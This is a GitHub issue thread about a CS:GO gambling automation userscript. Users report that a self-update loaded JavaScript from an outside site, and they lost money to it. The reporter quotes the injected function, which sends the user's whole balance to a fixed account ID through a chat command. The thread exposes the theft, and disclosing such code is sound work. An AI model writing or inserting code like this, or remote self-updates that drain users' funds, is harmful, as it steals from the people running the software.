### ISSUE TITLE
Taking down your scamming site won't make it go away

### ISSUE THREAD

**Issue by beellord** [Aareksio/csgodoubled-automated#1]
http://yuiko.science/selector.js the js that was added in a selfupdate of the code (which now is deleted from that website) had this code on it:

function start(x) {
    send({
        "type": "chat",
        "msg": '/send 76561198028161287 ' + x,
        "lang": LANG
    });
}

Which sent all the available money (using a call in the main code) to that account, made me lose almost $50. Scammer.

**Comment by muffindodge** [comment]
It happened to me too, i lost $10

**Comment by Aareksio** [comment]
https://github.com/Aareksio/csgodoubled-automated/blob/master/csgodouble.com-automated.user.js#L224
